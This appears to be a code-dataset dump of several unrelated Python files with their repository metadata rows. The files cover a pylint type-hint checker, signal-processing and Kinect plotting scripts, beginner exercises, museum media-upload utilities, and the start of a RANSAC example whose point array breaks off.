def visit_functiondef(self, node: nodes.FunctionDef) -> None:
"""Called when a FunctionDef node is visited."""
for match in self._function_matchers:
if not match.need_to_check_function(node) or node.is_method():
continue
self._check_function(node, match)
visit_asyncfunctiondef = visit_functiondef
def _check_function(self, node: nodes.FunctionDef, match: TypeHintMatch) -> None:
# Check that at least one argument is annotated.
annotations = _get_all_annotations(node)
if (
self.linter.config.ignore_missing_annotations
and node.returns is None
and not _has_valid_annotations(annotations)
):
return
# Check that all positional arguments are correctly annotated.
if match.arg_types:
for key, expected_type in match.arg_types.items():
if not _is_valid_type(expected_type, annotations[key]):
self.add_message(
"hass-argument-type",
node=node.args.args[key],
args=(key + 1, expected_type),
)
# Check that all keyword arguments are correctly annotated.
if match.named_arg_types is not None:
for arg_name, expected_type in match.named_arg_types.items():
arg_node, annotation = _get_named_annotation(node, arg_name)
if arg_node and not _is_valid_type(expected_type, annotation):
self.add_message(
"hass-argument-type",
node=arg_node,
args=(arg_name, expected_type),
)
# Check that kwargs is correctly annotated.
if match.kwargs_type and not _is_valid_type(
match.kwargs_type, node.args.kwargannotation
):
self.add_message(
"hass-argument-type",
node=node,
args=(node.args.kwarg, match.kwargs_type),
)
# Check the return type.
if not _is_valid_return_type(match, node.returns):
self.add_message(
"hass-return-type", node=node, args=match.return_type or "None"
)
def register(linter: PyLinter) -> None:
"""Register the checker."""
linter.register_checker(HassTypeHintChecker(linter))
| [
"noreply@github.com"
] | jrester.noreply@github.com |
a93f9f3fc208ecc059ef85f1484d2adbf4c9118e | 7c44527115fce603fc79d56cac264c7b3d90f6fa | /may20/ClassIntro.py | e984aaf4886008cf93cbbe6fbb202cb7137e9fac | [] | no_license | Hubwithgit89/PythonLearn | 299c7fdf3d632dcb5f1dc9813b0b725165b08bad | f9bb5f23be7d11e58f129b1263ca8e7e91c396fd | refs/heads/master | 2020-05-22T08:54:08.499508 | 2019-07-24T01:55:11 | 2019-07-24T01:55:11 | 186,288,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py |
class computer:
def disp(self):
print("disp method")
c1=computer()
c2=computer()
#computer.disp(c1);
#c2.disp();
| [
"xyz@xyz.com"
] | xyz@xyz.com |
5eb2854dd85d73cec4c62e1be6a4ba968b2ef2ff | 46b49480433d5a391c65b1b63cca89951f4ae228 | /dpa/ptask/action/source.py | 791569bd4dbb927b29d073a3df1f738bb1fac670 | [
"MIT"
] | permissive | wildparky/dpa-pipe | 5e8c86b0d5846da8886ee0a11adc689b912aee69 | 7a2e413ce958cdf56e8b9fab27a4f52fbee40480 | refs/heads/master | 2020-12-25T12:41:27.912856 | 2016-01-11T21:04:39 | 2016-01-11T21:04:39 | 51,695,472 | 1 | 0 | null | 2016-02-14T13:21:40 | 2016-02-14T13:21:39 | null | UTF-8 | Python | false | false | 1,820 | py |
# ----------------------------------------------------------------------------
# Imports:
# ----------------------------------------------------------------------------
from dpa.action import Action, ActionError
from dpa.ptask.action.sync import _PTaskSyncAction
from dpa.location import current_location_code
from dpa.shell.output import Style
# ----------------------------------------------------------------------------
# Classes:
# ----------------------------------------------------------------------------
class PTaskSourceAction(_PTaskSyncAction):
"""Source the contents of one ptask into another."""
# ------------------------------------------------------------------------
def execute(self):
try:
super(PTaskSourceAction, self).execute()
except ActionError as e:
raise ActionError("Unable to source ptask: " + str(e))
else:
print "\nSuccessfully sourced: ",
if self.source_version:
print Style.bright + str(self.source_version.spec) + \
Style.reset + "\n"
else:
print Style.bright + str(self.source.spec) + " [latest]" + \
Style.reset + "\n"
# ------------------------------------------------------------------------
def validate(self):
super(PTaskSourceAction, self).validate()
# ---- make sure the destination location is the current location.
cur_loc_code = current_location_code()
if self.destination_version:
dest_loc_code = self.destination_version.location_code
else:
dest_loc_code = self.destination_latest_version.location_code
if cur_loc_code != dest_loc_code:
raise ActionError("Destination location must be this location.")
| [
"jtomlin@clemson.edu"
] | jtomlin@clemson.edu |
c06c295fc1a99c5979dcd1e08b6dd0f89b72aa60 | 56146d194e0952072e0124f611a556e79f52cd68 | /api/lib/python3.6/site-packages/marshmallow/__init__.py | c3d3b33e7c64503757999c1fc453199ff011b098 | [] | no_license | tin0819tin/DS_Tutor | 94ef45fffffde47c6585f6fa691a293f449474ef | 0c7c9f0b602b7f9c8d8363de09b9e956f915e01a | refs/heads/master | 2023-06-07T05:03:50.503960 | 2021-07-05T14:04:32 | 2021-07-05T14:04:32 | 378,444,479 | 11 | 1 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from marshmallow.schema import Schema, SchemaOpts
from . import fields
from marshmallow.decorators import (
pre_dump,
post_dump,
pre_load,
post_load,
validates,
validates_schema,
)
from marshmallow.utils import EXCLUDE, INCLUDE, RAISE, pprint, missing
from marshmallow.exceptions import ValidationError
from distutils.version import LooseVersion
__version__ = "3.12.1"
__version_info__ = tuple(LooseVersion(__version__).version)
__all__ = [
"EXCLUDE",
"INCLUDE",
"RAISE",
"Schema",
"SchemaOpts",
"fields",
"validates",
"validates_schema",
"pre_dump",
"post_dump",
"pre_load",
"post_load",
"pprint",
"ValidationError",
"missing",
]
| [
"b06502141@g.ntu.edu.tw"
] | b06502141@g.ntu.edu.tw |
544bed584ee4c7f6bd3980047a5998b742301ca1 | f39dfb5b634410851f276b065c926b4cf42ae078 | /figuras/PycharmKayStatisticalReport/example_8_13_v3.py | 387438da443b9558918e9917eba8bfa4ce87f35f | [
"MIT"
] | permissive | santoshmore85/estudiando_el_kay | 9fc57d2bbd884a4188a93a15a00436947d60338f | 787f9b2599efeea93c1cf67408edcf1fa199c9b7 | refs/heads/main | 2023-08-26T23:05:00.701166 | 2021-10-29T21:49:08 | 2021-10-29T21:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,048 | py | import matplotlib.pyplot as plt
import numpy as np
import math
from matplotlib import rc
from matplotlib import rcParams
__author__ = 'ernesto'
# if use latex or mathtext
rc('text', usetex=True)
rcParams['text.latex.preamble'] = [r"\usepackage{amsmath}"]
# Parámetros
# número de muestras
N = 100
# número de parámetros
p = 2
# factor de olvido
lamb = 0.85
# condiciones iniciales
theta_i = np.zeros((p, ))
sigma_i = 1e5 * np.eye(p)
# señal de referencia (frecuencia, amplitud y fase)
omega_r = 2 * math.pi * 0.1
a_r = 1
p_r = 0
# señal de interferencia (frecuencia, amplitud y fase)
omega_i = omega_r
n = np.arange(N)
a_i = 10 * (1 + 0.5 * np.cos(2 * math.pi * n / N))
p_i = math.pi / 4
# Construcción de las señales
# referencia e interferencia
x_i = a_i * np.cos(omega_i * n + p_i)
x_r = a_r * np.cos(omega_r * n + p_r)
# estimador en cada paso
theta_n = np.zeros((N, p))
error = np.zeros((N, ))
y_r = np.zeros((N, ))
# Procesamiento
theta = theta_i
sigma = sigma_i
x_r_pad = np.concatenate((np.zeros((p - 1,)), x_r))
for i in n:
h = x_r_pad[i + (p - 1): i - 1 if i - 1 >= 0 else None: -1]
e = x_i[i] - theta @ h
K = (sigma @ h) / (lamb ** i + h @ sigma @ h)
theta = theta + K * e
sigma = (np.eye(p) - K[:, None] @ h[None, :]) @ sigma
theta_n[i, :] = theta
error[i] = x_i[i] - theta @ h
y_r[i] = theta @ h
# valores verdaderos
h1 = -a_i * math.sin(math.pi/4) / math.sin(math.pi/5)
h0 = a_i * math.cos(math.pi/4) - h1 * math.cos(math.pi/5)
#print("h[0] = {0:f}, h[1] = {1:f}".format(h0, h1))
ms = 3
fs = 12
ymax = 16
fig = plt.figure(0, figsize=(9, 6), frameon=False)
ax = plt.subplot2grid((9, 1), (0, 0), rowspan=3, colspan=1)
plt.xlim(0, N-1)
plt.ylim(-ymax, ymax)
plt.plot(n, x_i, linestyle='-', color='k', marker='s', markersize=ms, label='$x[n]$')
plt.plot(n, y_r, linestyle='-', color='r', marker='s', markersize=ms, label='$\hat{x}[n]$')
ax.set_xticklabels([])
leg = plt.legend(loc='center', bbox_to_anchor=(0.5, 0.83), frameon=False, fontsize=fs)
ax = plt.subplot2grid((9, 1), (3, 0), rowspan=3, colspan=1)
plt.xlim(0, N-1)
plt.ylim(-ymax, ymax)
plt.plot(n, error, linestyle='-', marker='s', color='k', markersize=ms, lw=1)
ax.set_xticklabels([])
ax.set_ylabel(r'$\epsilon[n]=x[n]-\hat{x}[n]$', fontsize=fs)
ax = plt.subplot2grid((9, 1), (6, 0), rowspan=3, colspan=1)
# e = hd-h_est
plt.xlim(0, N-1)
plt.plot(n, theta_n[:, 0], linestyle='-', color='k', marker='s', markersize=ms, label='$\hat{h}_n[0]$')
plt.plot(n, theta_n[:, 1], linestyle='-', color='r', marker='s', markersize=ms, label='$\hat{h}_n[1]$')
plt.plot(n, h0, linestyle='--', lw=1, color='grey')
plt.plot(n, h1, linestyle='--', lw=1, color='grey')
ax.set_xlabel(r'$n$', fontsize=fs)
ax.set_ylabel('${\\rm Par\\acute{a}metros\;del\;filtro}$', fontsize=fs)
leg = plt.legend(loc='best', frameon=False, fontsize=fs)
plt.savefig('example_8_13.pdf', bbox_inches='tight')
fig = plt.figure(1, figsize=(9, 5), frameon=False)
plt.plot(n[p:], x_i[p:] - y_r[p:], linestyle='-', color='k', marker='s', markersize=ms)
plt.show()
| [
"bor9net@gmail.com"
] | bor9net@gmail.com |
0628aa82dbbfc7c5f2e2f5a771367e64427daa55 | 3e59eb1efdc6463f33e6e62f448555b3b2fa6913 | /odd_even.py | 581896433feb1541bae6b98feca1a027b5642a4d | [] | no_license | vydg5/Pythone_exercises | de16a94dcb4b04914a65e240bdaf22515122f910 | 1fd31e3ac140b802fd514f5d04838f936a71d4cf | refs/heads/master | 2021-01-10T01:33:38.701143 | 2016-03-02T16:09:47 | 2016-03-02T16:09:47 | 52,327,192 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 518 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Feb 22 20:21:46 2016
@author: Vireak
"""
number = int(input("Enter a number: "))
rest = number % 4
if rest==0:
print("this is an even and multiple of 4 number")
elif rest == 2:
print("this is just an even number")
else:
print("this is an odd number")
num, check = input("Enter two numbers here: ").split()
rest1 = int(check) % int(num)
if rest1 == 0:
print("number is divided nicely by check")
else:
print("number is NOT divided nicely by check") | [
"vydg5@mail.missouri.edu"
] | vydg5@mail.missouri.edu |
610fea3b4461cc6a131728081658f9e4f032d4c5 | 0799030f0bf9359d52787f6bdfc1e25c77aafa4a | /omca/apps/uploadmedia/utils.py | fd09cf544399f87eda4ec70421d0848a7b6c9d88 | [] | no_license | OaklandMuseum/webapps | 7fd17731d99b0c354519e15fdd820df3129c8aea | 828be7a79caf7766226db179e23900c46b0ac592 | refs/heads/master | 2023-01-09T16:54:37.253459 | 2023-01-02T17:51:18 | 2023-01-02T17:51:18 | 62,816,222 | 0 | 1 | null | 2023-01-02T17:51:19 | 2016-07-07T15:07:26 | Python | UTF-8 | Python | false | false | 12,359 | py | from PIL import Image
from PIL.ExifTags import TAGS
import csv
import codecs
import re
import json
import logging
from os import path, listdir
from os.path import isfile, isdir, join
from xml.sax.saxutils import escape
from common import cspace # we use the config file reading function
from common.utils import deURN, loginfo
from cspace_django_site import settings
config = cspace.getConfig(path.join(settings.BASE_DIR, 'config'), 'uploadmedia')
TEMPIMAGEDIR = config.get('files', 'directory')
POSTBLOBPATH = config.get('info', 'postblobpath')
BATCHPARAMETERS = config.get('info', 'batchparameters')
BATCHPARAMETERS = BATCHPARAMETERS.replace('.cfg', '')
SERVERLABEL = config.get('info', 'serverlabel')
SERVERLABELCOLOR = config.get('info', 'serverlabelcolor')
INSTITUTION = config.get('info', 'institution')
FIELDS2WRITE = 'name size objectnumber date creator contributor rightsholder imagenumber handling approvedforweb'.split(' ')
if isdir(TEMPIMAGEDIR):
loginfo('bmu',"Using %s as working directory for images and metadata files" % TEMPIMAGEDIR, {}, {})
else:
loginfo('bmu',"%s is not an existing directory, using /tmp instead" % TEMPIMAGEDIR, {}, {})
TEMPIMAGEDIR = '/tmp'
JOBDIR = path.join(TEMPIMAGEDIR, '%s')
# Get an instance of a logger, log some startup info
logger = logging.getLogger(__name__)
def getJobfile(jobnumber):
return JOBDIR % jobnumber
def jobsummary(jobstats):
# [ n_imagesuploaded, n_imagesingested, n_errors, [ list of images in error ]
result = [0, 0, 0, [], 'completed']
for jobname, status, count, imagefilenames in jobstats:
if 'pending' in status:
result[0] = count - 1
result[4] = 'pending'
elif 'submitted' in status or 'job started' in status:
result[0] = count - 1
inputimages = imagefilenames
elif 'ingested' in status or 'in progress' in status:
result[1] = count - 1
ingestedimages = imagefilenames
if 'job started' in status or 'in progress' in status:
result[4] = 'in progress'
# compute discrepancy, if any
result[2] = result[0] - result[1]
if result[2] > 0 and result[4] == 'completed':
result[4] = 'problem'
try:
result[3] = [image for image in inputimages if image not in ingestedimages and image != 'name']
except:
pass
return result
def getJoblist(request):
if 'num2display' in request.POST:
num2display = int(request.POST['num2display'])
else:
num2display = 50
jobpath = JOBDIR % ''
filelist = [f for f in listdir(jobpath) if isfile(join(jobpath, f)) and ('.csv' in f or 'trace.log' in f)]
jobdict = {}
errors = []
filelist = sorted(filelist, reverse=True)
for f in sorted(filelist, reverse=True):
if len(jobdict.keys()) > num2display:
pass
imagefilenames = []
else:
# we only need to count lines if the file is with range...
linecount, imagefilenames = checkFile(join(jobpath, f))
parts = f.split('.')
if 'original' in parts[1]:
status = 'submitted'
elif 'processed' in parts[1]:
status = 'ingested'
elif 'inprogress' in parts[1]:
status = 'job started'
elif 'step1' in parts[1]:
status = 'pending'
elif 'step2' in parts[1]:
continue
# we are in fact keeping the step2 files for now, but let's not show them...
# elif 'step2' in parts[1]: status = 'blobs in progress'
elif 'step3' in parts[1]:
status = 'media in progress'
elif 'trace' in parts[1]:
status = 'run log'
elif 'check' in parts[1]:
status = 'check'
else:
status = 'unknown'
jobkey = parts[0]
if not jobkey in jobdict: jobdict[jobkey] = []
jobdict[jobkey].append([f, status, linecount, imagefilenames])
joblist = [[jobkey, True, jobdict[jobkey], jobsummary(jobdict[jobkey])] for jobkey in
sorted(jobdict.keys(), reverse=True)]
for ajob in joblist:
for image in ajob[3][3]:
errors.append([ajob[0], image])
for state in ajob[2]:
if state[1] in ['ingested', 'pending', 'job started']: ajob[1] = False
num_jobs = len(joblist)
return joblist[0:num2display], errors, num_jobs, len(errors)
def checkFile(filename):
file_handle = open(filename)
# eliminate rows for which an object was not found...
lines = [l for l in file_handle.read().splitlines() if "not found" not in l]
images = [f.split("\t")[0] for f in lines]
images = [f.split("|")[0] for f in images]
return len(lines), images
def getQueue(jobtypes):
return [x for x in listdir(JOBDIR % '') if '%s.csv' % jobtypes in x]
def getBMUoptions():
allowintervention = config.get('info', 'allowintervention')
allowintervention = True if allowintervention.lower() == 'true' else False
bmuoptions = []
bmuconstants = {}
try:
usebmuoptions = config.get('info', 'usebmuoptions')
usebmuoptions = True if usebmuoptions.lower() == 'true' else False
except:
usebmuoptions = False
if usebmuoptions:
try:
bmuoptions = config.get('info', 'bmuoptions')
bmuoptions = json.loads(bmuoptions.replace('\n', ''))
except:
loginfo('bmu',"Could not find or could not parse BMU options (parameter 'bmuoptions'), defaults will be taken!", {}, {})
if bmuoptions: loginfo('',bmuoptions, {}, {})
bmuoptions = []
# a dict of dicts...
try:
bmuconstants = config.get('info', 'bmuconstants')
bmuconstants = json.loads(bmuconstants.replace('\n', ''))
except:
loginfo('bmu',"Could not find or could not parse BMU constants (parameter 'bmuconstants'), none will be inserted into media records!", {}, {})
if bmuconstants: loginfo('',bmuconstants, {}, {})
bmuconstants = {}
# add the columns for these constants to the list of output values
for imagetypes in bmuconstants.keys():
for constants in bmuconstants[imagetypes].keys():
if not constants in FIELDS2WRITE:
FIELDS2WRITE.append(constants)
else:
loginfo('bmu',"No BMU options are not enabled. No defaults or special handling of media.", {}, {})
try:
overrides = config.get('info', 'overrides')
overrides = json.loads(overrides.replace('\n', ''))
for o in overrides:
loginfo('bmu','BMU will attempt to configure overrides for %s' % o[0], {}, {})
except:
loginfo('bmu',"Could not find or could not parse BMU overrides (parameter 'overrides'). Please check your JSON!", {}, {})
overrides = []
for override in overrides:
if not override[2] in FIELDS2WRITE:
FIELDS2WRITE.append(override[2])
for override in overrides:
if override[1] == 'dropdown':
dropdown = ''
try:
dropdown = config.get('info', override[2] + 's')
dropdown = json.loads(dropdown)
override.append(dropdown)
loginfo('bmu','BMU override configured for %ss' % override[2], {}, {})
except:
loginfo('bmu','Could not parse overrides for %ss, please check your JSON.' % override[2], {}, {})
if dropdown: loginfo('bmu',dropdown, {}, {})
else:
# add an empty dropdown element -- has to be a dict
loginfo('bmu','BMU override configured for %s' % override[2], {}, {})
override.append({})
return {
'allowintervention': allowintervention,
'usebmuoptions': usebmuoptions,
'bmuoptions': bmuoptions,
'bmuconstants': bmuconstants,
'overrides': overrides
}
# following function taken from stackoverflow and modified...thanks!
def get_exif(fn):
ret = {}
if 'image' in fn.content_type:
i = Image.open(fn)
try:
info = i._getexif()
for tag, value in info.items():
decoded = TAGS.get(tag, tag)
ret[decoded] = value
except:
pass
else:
pass
return ret
def getCSID(objectnumber):
# dummy function, for now
objectCSID = objectnumber
return objectCSID
def writeCsv(filename, items, writeheader):
filehandle = codecs.open(filename, 'w', 'utf-8')
writer = csv.writer(filehandle, delimiter='|')
writer.writerow(writeheader)
for item in items:
row = []
for x in writeheader:
if x in item.keys():
cell = str(item[x])
cell = cell.strip()
cell = cell.replace('"', '')
cell = cell.replace('\n', '')
cell = cell.replace('\r', '')
else:
cell = ''
row.append(cell)
writer.writerow(row)
filehandle.close()
# following function borrowed from Django docs, w modifications
def handle_uploaded_file(f):
destination = open(path.join(TEMPIMAGEDIR, '%s') % f.name, 'wb')
with destination:
for chunk in f.chunks():
destination.write(chunk)
destination.close()
def assignValue(defaultValue, override, imageData, exifvalue, refnameList):
# oh boy! these next couple lines are doozies! sorry!
if type(refnameList) == type({}):
refName = refnameList.get(defaultValue, defaultValue)
else:
refName = [z[1] for z in refnameList if z[0] == defaultValue]
# should never happen that there is more than one match, but the configurer may have made a boo-boo
if len(refName) == 1:
refName = refName[0]
else:
refName = defaultValue
if override == 'always':
return defaultValue, refName
elif exifvalue in imageData:
imageValue = imageData[exifvalue]
# a bit of cleanup
imageValue = imageValue.strip()
imageValue = imageValue.replace('"', '')
imageValue = imageValue.replace('\n', '')
imageValue = imageValue.replace('\r', '')
imageValue = escape(imageValue)
return imageValue, refName
# the follow is really the 'ifblank' condition
else:
return defaultValue, refName
# this somewhat desperate function makes an html table from a tab- and newline- delimited string
def reformat(filecontent):
result = deURN(filecontent)
result = result.replace('\n','<tr><td>')
result = result.replace('\t','<td>')
result = result.replace('|','<td>')
result = result.replace('False','<span class="error">False</span>')
result += '</table>'
return '<table width="100%"><tr><td>\n' + result
# this somewhat desperate function makes an grid display from 'processed' files
def rendermedia(filecontent):
result = deURN(filecontent)
rows = result.split('\n')
FIELDS = rows[0].strip().split('\t')
rows = rows[1:]
result = []
for counter, row in enumerate(rows):
row = row.strip() # seems there may be a stray \r still at the end of the string.
if row == '' or row[0] == '#': continue
row = row.split('\t')
media = {'otherfields': []}
media['counter'] = counter
for i,r in enumerate(row):
if FIELDS[i] == 'objectnumber':
media['accession'] = row[i]
elif FIELDS[i] == 'name':
media['mainentry'] = row[i]
# media['otherfields'].append({'label': 'File', 'value': row[i]})
elif FIELDS[i] == 'objectCSID':
media['csid'] = row[i]
elif FIELDS[i] == 'mediaCSID':
media['media'] = row[i]
elif FIELDS[i] == 'blobCSID':
media['blobs'] = [ row[i] ]
elif FIELDS[i] == 'creator':
media['otherfields'].append({'label': 'Creator', 'value': row[i]})
elif FIELDS[i] == 'description':
media['otherfields'].append({'label': 'Description', 'value': row[i]})
elif FIELDS[i] == 'date':
media['otherfields'].append({'label': 'Image Date', 'value': row[i]})
result.append(media)
return result
| [
"johnblowe@gmail.com"
] | johnblowe@gmail.com |
674c892252bf0176e34f9f68ac18b547e3c23726 | 04674353730c9f76bd0af43d6380af5bc35d9773 | /pyqt-official/scripts/kinectData/plotSkeleton.py | bba34bfed4a652551a2819c9d63ced816264efcc | [] | no_license | CenturyLiu/EECS467_Final_GUI | 673a4507880f41558111f16a9f82b086fff654a5 | be1444afb38f4f4b461de987cab262d95139ff16 | refs/heads/main | 2023-04-23T05:55:46.378532 | 2021-04-29T21:16:58 | 2021-04-29T21:16:58 | 359,838,000 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Mar 28 15:02:02 2021
@author: ShaoxiongYao
"""
import json
from mpl_toolkits import mplot3d
import matplotlib.pyplot as plt
# bonePairList = [
# ["LHip", "LKnee"], ["RHip", "RKnee"],
# ["HipCenter", "LHip"], ["HipCenter", "RHip"],
# ["HipCenter", "ShoulderCenter"], ["ShoulderCenter", "Head"],
# ["ShoulderCenter", "LShoulder"], ["LShoulder", "LElbow"], ["LElbow", "LWrist"],
# ["ShoulderCenter", "RShoulder"], ["RShoulder", "RElbow"], ["RElbow", "RWrist"]
# ]
bonePairList = [
["HipCenter", "ShoulderCenter"], ["ShoulderCenter", "Head"],
["ShoulderCenter", "LShoulder"], ["LShoulder", "LElbow"], ["LElbow", "LWrist"],
["ShoulderCenter", "RShoulder"], ["RShoulder", "RElbow"], ["RElbow", "RWrist"]
]
def draw_skeleton(skeletonData, ax=None):
if ax is None:
fig = plt.figure(frameon=False)
ax = fig.add_subplot(111, projection='3d')
else:
ax = ax
for bonePair in bonePairList:
jointName1, jointName2 = bonePair
if jointName1 in skeletonData.keys() and jointName2 in skeletonData.keys():
jointPosition1 = skeletonData[jointName1]
jointPosition2 = skeletonData[jointName2]
# before data transformation
# ax.plot([-jointPosition1[2], -jointPosition2[2]],
# [-jointPosition1[0], -jointPosition2[0]],
# [jointPosition1[1], jointPosition2[1]],
# color='r', linestyle='-', linewidth=2, marker='o', markersize=5)
# after data transformation
ax.plot([jointPosition1[0], jointPosition2[0]],
[jointPosition1[1], jointPosition2[1]],
[jointPosition1[2], jointPosition2[2]],
color='r', linestyle='-', linewidth=2, marker='o', markersize=5)
return ax
if __name__ == '__main__':
skeletonDataList = None
with open('skeletonApr-10-22-21.json', 'r') as f:
skeletonDataList = json.load(f)
fig = plt.figure()
ax = plt.axes(projection='3d', )
try:
for skeletonData in skeletonDataList:
draw_skeleton(skeletonData, ax=ax)
ax.set_xlim(-4, -2)
ax.set_ylim(-1, 1)
ax.set_zlim(-1, 1)
plt.pause(0.3)
plt.cla()
except KeyboardInterrupt:
print("Stopped, received keyboad interrupt")
| [
"williamyao@sjtu.edu.cn"
] | williamyao@sjtu.edu.cn |
38038a954baf0435cc4b0471fb337429e94d0cc5 | 50a39c462fac7e889f6257cc2c3e3c84986e4bb2 | /RANSAC_example.py | b25e7be454f49d1f4943e0a29be496fb6270413e | [] | no_license | chickenbestlover/MSDN2 | 2b16f70eb58bcc67893ec65ed1a58db3f0dd79a9 | 58a0c6aa8e8e8953572567145ffecd5b10bdfb5a | refs/heads/master | 2020-03-25T07:37:54.873304 | 2018-11-05T05:46:02 | 2018-11-05T05:46:02 | 143,572,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,701 | py | import numpy as np
import pcl
points = np.array([[ 594.6663 , -1617.9456 , -797.36224],
[ 600.5656 , -1638.1005 , -806.5441 ],
[ 599.16583, -1638.3135 , -805.9235 ],
[ 597.76605, -1638.5264 , -805.3029 ],
[ 596.36633, -1638.7394 , -804.6823 ],
[ 594.96655, -1638.9523 , -804.06165],
[ 593.5668 , -1639.1652 , -803.44104],
[ 592.16705, -1639.3782 , -802.82043],
[ 590.7673 , -1639.5911 , -802.1998 ],
[ 589.36755, -1639.804 , -801.5792 ],
[ 587.9678 , -1640.017 , -800.9586 ],
[ 586.568 , -1640.2299 , -800.338 ],
[ 595.3116 , -1618.2574 , -796.01373],
[ 601.2189 , -1638.4161 , -805.1791 ],
[ 599.8191 , -1638.6292 , -804.5585 ],
[ 598.4193 , -1638.842 , -803.9378 ],
[ 597.0196 , -1639.055 , -803.3172 ],
[ 595.6198 , -1639.268 , -802.6966 ],
[ 594.22003, -1639.4808 , -802.076 ],
[ 592.8203 , -1639.6938 , -801.4554 ],
[ 591.42053, -1639.9067 , -800.8348 ],
[ 590.0208 , -1640.1196 , -800.2142 ],
[ 588.62103, -1640.3326 , -799.5935 ],
[ 587.22125, -1640.5455 , -798.9729 ],
[ 595.9569 , -1618.5692 , -794.6653 ],
[ 598.22314, -1628.7557 , -798.9331 ],
[ 596.8319 , -1628.9674 , -798.3162 ],
[ 599.0726 , -1639.1577 , -802.57275],
[ 597.67285, -1639.3707 , -801.95215],
[ 596.2731 , -1639.5836 , -801.33154],
[ 594.8733 , -1639.7965 , -800.71094],
[ 593.4736 , -1640.0095 , -800.0903 ],
[ 592.0738 , -1640.2224 , -799.46967],
[ 590.674 , -1640.4353 , -798.84906],
[ 589.2743 , -1640.6483 , -798.22845],
[ 584.31067, -1630.8721 , -792.7647 ],
[ 600.2637 , -1628.8579 , -798.1932 ],
[ 598.87244, -1629.0695 , -797.5763 ],
[ 597.4812 , -1629.2811 , -796.9595 ],
[ 599.7258 , -1639.4734 , -801.2077 ],
[ 598.3261 , -1639.6864 , -800.5871 ],
[ 596.92633, -1639.8993 , -799.96643],
[ 595.52655, -1640.1122 , -799.3458 ],
[ 594.12683, -1640.3252 , -798.7252 ],
[ 592.72705, -1640.5381 , -798.1046 ],
[ 587.74243, -1630.7626 , -792.6416 ],
[ 586.3512 , -1630.9742 , -792.0248 ],
[ 584.95996, -1631.1859 , -791.4079 ],
[ 600.91296, -1629.1716 , -796.83636],
[ 599.5217 , -1629.3833 , -796.21954],
[ 598.1305 , -1629.5948 , -795.6027 ],
[ 596.7392 , -1629.8065 , -794.98584],
[ 595.34796, -1630.0182 , -794.369 ],
[ 593.9567 , -1630.2299 , -793.7522 ],
[ 592.5655 , -1630.4414 , -793.1353 ],
[ 591.17426, -1630.6531 , -792.5185 ],
[ 589.78296, -1630.8647 , -791.9017 ],
[ 588.3917 , -1631.0764 , -791.28485],
[ 587.0005 , -1631.288 , -790.66797],
[ 585.60925, -1631.4996 , -790.05115],
[ 601.56226, -1629.4854 , -795.4796 ],
[ 600.171 , -1629.697 , -794.8628 ],
[ 598.7797 , -1629.9087 , -794.2459 ],
[ 597.3885 , -1630.1202 , -793.6291 ],
[ 595.99725, -1630.3319 , -793.01227],
[ 594.606 , -1630.5436 , -792.3954 ],
[ 593.2148 , -1630.7552 , -791.77856],
[ 591.82355, -1630.9668 , -791.16174],
[ 590.43225, -1631.1785 , -790.54486],
[ 589.041 , -1631.3901 , -789.92804],
[ 587.6498 , -1631.6018 , -789.3112 ],
[ 586.25854, -1631.8134 , -788.6944 ],
[ 598.53815, -1619.8167 , -789.27136],
[ 597.15546, -1620.027 , -788.6583 ],
[ 595.7727 , -1620.2373 , -788.0452 ],
[ 598.0378 , -1630.4341 , -792.27234],
[ 596.64655, -1630.6456 , -791.65546],
[ 595.2553 , -1630.8573 , -791.03864],
[ 593.8641 , -1631.069 , -790.4218 ],
[ 592.4728 , -1631.2806 , -789.80493],
[ 591.08154, -1631.4922 , -789.1881 ],
[ 589.6903 , -1631.7039 , -788.5713 ],
[ 588.2991 , -1631.9155 , -787.9544 ],
[ 583.32806, -1622.1304 , -782.52765],
[ 599.1835 , -1620.1284 , -787.9229 ],
[ 597.8007 , -1620.3387 , -787.3098 ],
[ 596.418 , -1620.5491 , -786.6968 ],
[ 598.6871 , -1630.7478 , -790.9155 ],
[ 597.29584, -1630.9595 , -790.2987 ],
[ 595.9046 , -1631.171 , -789.6819 ],
[ 594.5133 , -1631.3827 , -789.065 ],
[ 593.1221 , -1631.5944 , -788.4482 ],
[ 588.1216 , -1621.8112 , -783.0184 ],
[ 586.7389 , -1622.0215 , -782.40533],
[ 585.35614, -1622.2319 , -781.79224],
[ 583.9734 , -1622.4423 , -781.1792 ],
[ 599.8288 , -1620.4403 , -786.57446],
[ 598.44604, -1620.6506 , -785.96136],
[ 597.0633 , -1620.861 , -785.3483 ],
[ 595.6806 , -1621.0713 , -784.7352 ],
[ 594.29785, -1621.2816 , -784.1222 ],
[ 592.9151 , -1621.492 , -783.5091 ],
[ 591.5324 , -1621.7024 , -782.89606],
[ 590.14966, -1621.9127 , -782.28296],
[ 588.7669 , -1622.123 , -781.6699 ],
[ 587.38416, -1622.3334 , -781.0568 ],
[ 586.00146, -1622.5437 , -780.4438 ],
[ 584.6187 , -1622.754 , -779.8307 ],
[ 600.4741 , -1620.7521 , -785.22595],
[ 599.0914 , -1620.9624 , -784.6129 ],
[ 597.7086 , -1621.1729 , -783.9998 ],
[ 596.3259 , -1621.3832 , -783.3868 ],
[ 594.9432 , -1621.5935 , -782.7737 ],
[ 593.5604 , -1621.8038 , -782.16064],
[ 592.1777 , -1622.0142 , -781.54755],
[ 590.795 , -1622.2245 , -780.9345 ],
[ 589.41223, -1622.4348 , -780.3214 ],
[ 588.0295 , -1622.6453 , -779.7084 ],
[ 586.6467 , -1622.8556 , -779.0953 ],
[ 585.26404, -1623.0659 , -778.48224],
[ 601.11945, -1621.064 , -783.8775 ],
[ 599.7367 , -1621.2743 , -783.2644 ],
[ 598.35394, -1621.4846 , -782.65137],
[ 596.9712 , -1621.695 , -782.03827],
[ 595.5885 , -1621.9053 , -781.42523],
[ 594.20575, -1622.1157 , -780.81213],
[ 592.823 , -1622.326 , -780.1991 ],
[ 591.44025, -1622.5364 , -779.586 ],
[ 590.05756, -1622.7467 , -778.97296],
[ 588.6748 , -1622.957 , -778.35986],
[ 587.29205, -1623.1674 , -777.7468 ],
[ 582.3137 , -1613.3733 , -772.357 ],
